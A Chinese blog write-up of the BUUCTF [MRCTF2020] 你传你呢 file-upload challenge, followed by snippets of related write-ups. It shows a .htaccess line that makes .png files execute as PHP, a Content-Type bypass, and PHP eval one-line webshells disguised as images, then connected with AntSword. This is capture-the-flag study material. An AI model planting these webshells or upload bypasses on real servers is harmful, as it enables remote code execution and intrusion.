BUUCTF_web[MRCTF2020]你传你呢—超详细wp解析

最新推荐文章于 2024-06-24 16:17:13 发布
最新推荐文章于 2024-06-24 16:17:13 发布
阅读量1.1k 收藏 4
点赞数 1
分类专栏: web CTF 文章标签: 其他
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52653109/article/details/116451890
版权
web 同时被 2 个专栏收录
12 篇文章 0 订阅
订阅专栏
CTF
5 篇文章 1 订阅
订阅专栏

开始直接传木马,但不管是“图片马”还是其他格式的马,都传不上,一直返回
在这里插入图片描述

开始还以为是防火过滤太强了,一直试着绕过。看了下别人的wp原来考察了个htaccess(分布式配置文件)

看了百科和一些大佬的博客介绍的很抽象不好理解,推荐这个网站通俗易懂些 7个常用的.htaccess代码

在这里插入图片描述
下面是解题步骤:

一、创建个".htaccess"文件 写入

AddType application/x-httpd-php .png
意思是:上传的".png"会被当做 php代码执行。
在这里插入图片描述
先创个文档写入,再另存为选择所有文件形式改扩展名。
在这里插入图片描述
就是成功创立了
在这里插入图片描述

二、上传抓包修改

上传刚刚的文件,修改:content-type的数据,将**.htaccess**以png文件数据上传
在这里插入图片描述

三、注入一句话图片马

图片马制作类似上述**.htaccess制作**
文档写入一句话

<?php @eval($_POST['dj']);?>

然后以.png文件另存为
在这里插入图片描述
将图片马上传
在这里插入图片描述
成功上传
在这里插入图片描述

四、用蚁剑或菜刀链接

flag在根目录
在这里插入图片描述

东方黑手
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
BUUCTF-MISC-WP(详细解题思路)
01-27
BUUCTF-MISC-WP(详细解题思路)
920 820 等wp8详细高清官方越狱教程
05-02
920 820 等 w p 8 详细 高清官方 越狱教程
BUUCTF[MRCTF2020]你你ma呢
weixin_45253622的博客
05-16 426
直接上一句话木马发现: 将其改成jpg后缀,发现上成功; 然后我们需要上.htaccess文件将.jpg解析成 .php,文件内容如下: AddType application/x-httpd-php .jpg 上失败: 我们试试抓包修改, 我们访问之前的phpinfo.jpg发现: jpg图片已经成功被当场php解析。 成功上,我们使用菜刀连接我们上的一句话图片: 得到flag。 总结:上php不被允许,绕过不可以,想到上....
BUUCTF--Web详细wp_buuctfweb
最新发布
2401_84301352的博客
06-24 602
php.iniInclude然后Base64解码就可以得到flag。
BUUCTF之[MRCTF2020]你你呢-------文件解析漏洞
weixin_44632787的博客
06-19 9101
BUUCTF之[MRCTF2020]你你????呢 虽然这题对于大佬来说是属于简单题。但是对于我这种小白来说却是第一次见。算是学到东西了。所以在此记录一下,以后看到这种类似的题目也可以回来复习。。。 首先,启动挑战的项目 emmmmmmm这个页面很有个性。。。一开始以为只是个简单的文件上漏洞,结果没做出来。 不管怎么样,先上一句话木马。并且将下面的内容保存成文件1.png GIF89a? <script language="php">eval($_POST['zyh']);</s
web:[MRCTF2020]你你呢
sleepywin的博客
10-10 619
这里参考了大佬的wp,上一个.htaccess文件,这个.htaccess文件的作用就是把这个图片文件解析成php代码执行。上文件,先随便上一个文件看看情况。.htaccess文件的内容为。回显一片空白,说明木马上成功。构造含有一句话木马的图片上。这里用bp抓包修改类型。在根目录找到flag。
BUUCTF [MRCTF2020]你你呢1
m0_73995922的博客
12-15 255
总结下来的经验就是更改Apache里的.htaccess的配置。可以将其它类型的文件转化为PHP的文件类型。>,将文件改为图片格式,jpg或者png。提示我们上成功,发现使用蚁剑连不上,看了其他大佬的wp发现是文件解析漏洞。我们需要写个.htaccess使用php解析器对图片进行解析。这里看到.htaccess文件上成功,在使用蚁剑进行连接。上.htaccess文件,这里需要注意。.htaccess文件解析漏洞。.htaccess文件使用。
BUUCTF之你你马呢 [MRCTF2020]
金 帛的博客
05-05 5442
BUUCTFWP
[BUUCTF][MRCTF2020]部分web wp
cosmoslin的博客
10-11 714
[MRCTF2020]你你????呢 学习链接:[CTF].htaccess的使用技巧总结 fuzz测试,发现过滤了php后缀,中间件是apache,可以上png图片马。 思路:利用.htaccess来将png文件当作php文件解析 先上.htaccess文件,文件解析 AddType application/x-httpd-php .png 然后再上一个png图片马 最后用蚁剑连接就可以啦! [MRCTF2020]Ez_bypass include 'flag.php'; $flag='MR
BUUCTF_Web题目题解记录2
Altering_Ji的博客
07-11 938
记录三道做过的buu CTF刷题平台上的web类型题目,[MRCTF2020]Ez_bypass、[极客大挑战 2019]BuyFlag、[MRCTF2020]你你🐎呢,考点包括代码审计和文件上
buuctf_Reverse_wp_1
lyy0xfff的博客
03-05 1145
让edx寄存器,即存着数组的首地址,依次指向下一个字符在这途中al一直不为0,也即ZF标志位一直为0,则jnz指令会一直跳转到自己这里从而形成了循环,直到遇到0字节(即数组的最后一个截止符),因为此时al为0,ZF=1,此时jnz指令不会跳转则执行下一段汇编代码,结束循环以后,edx值为7(因为多了一个字符串结束符’\0’)所以写一个脚本跑一下,先大小写互换,然后用base64变表解密即可,所谓变表就是原本对于Base 64来说A就是对应的A,b就是对应的b,但通过变表以后,有一部分对应的内容不同了。
题解记录-BUUCTF|Web (持续更新中)
weixin_57448435的博客
09-17 2154
BUUCTF Web
wp-ajax-newsletter_u5pv.rar_WEB开发_PHP_
08-11
【标题】"wp-ajax-newsletter_u5pv.rar" 涉及的核心技术是WEB开发中的PHP编程,这个压缩包提供了一个Wordpress插件的源代码实现。Wordpress是一款广泛使用的开源内容管理系统,它允许用户通过安装和配置各种插件来...
web-product-dark_WordPress_wp_
10-03
【标题】"web-product-dark_WordPress_wp_" 指的是一款专门为RevoSlider设计的WordPress主题,名为"web-product-dark"。RevoSlider是一个流行的WordPress滑块插件,用于创建吸引人的动态内容展示,如产品滑块、图像...
在WordPress中使用wp_count_posts函数来统计文章数量
10-23
此外,`wp_count_posts()`函数有一个可选的`$type`参数,用于指定你想要查询的`wp_posts`表中的行类型,通常是`post`,但你可以根据需要更改。还有一个`$perm`参数,用于决定是否包含私密文章,当设置为'readable'时...
Buuctf[网鼎杯 2020 青龙组]AreUSerialz
weixin_52653109的博客
04-07 3311
[网鼎杯 2020 青龙组]AreUSerialz 打开题目仔细阅读源码 <?php include("flag.php"); highlight_file(__FILE__); //文件包含,联想到php://filter伪协议读取文件 class FileHandler { protected $op;//protected保护类,成员可以被自身以及其子类和父类访问 protected $filename; protected $content;
攻防世界_web新手区webshell题解wp——蚁剑解法
weixin_52653109的博客
12-15 543
一句话木马,结构如图 进入环境,发现是个小马。 上蚁剑 第一种解法,右键再虚拟终端 然后在终端用ls查看文件,再用cat打开 第二种方法 右键打开文件管理 找到flag文件,再打开就好了。 ...
Bugkuctf_web4题解wp
weixin_52653109的博客
12-10 394
考察知识点:post请求 工具burp suite 没有的小伙伴可以在 https://down.52pojie.cn/Tools/Network_Analyzer/ 里面下。 进入场景,很明显要post指令使what=flag 打开burp抓包修改(不会抓包的小伙伴,问度娘吧) 然后我们把get指令修改成host指令(选取get右键**“change request method”) 提交 what=flag 指令 然后点forward**,就得到flag flag{dffb78f5c59d
WP7入门教程:创建你的第一个应用
"WP7有约 PDF" 这篇内容是关于Windows Phone 7 (WP7) 应用开发的教程,特别适合对WP7有兴趣的初学者。教程以轻松幽默的方式引导读者进入WP7应用开发的世界。 首先,作者强调了在开始学习前的准备工作,包括安装...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值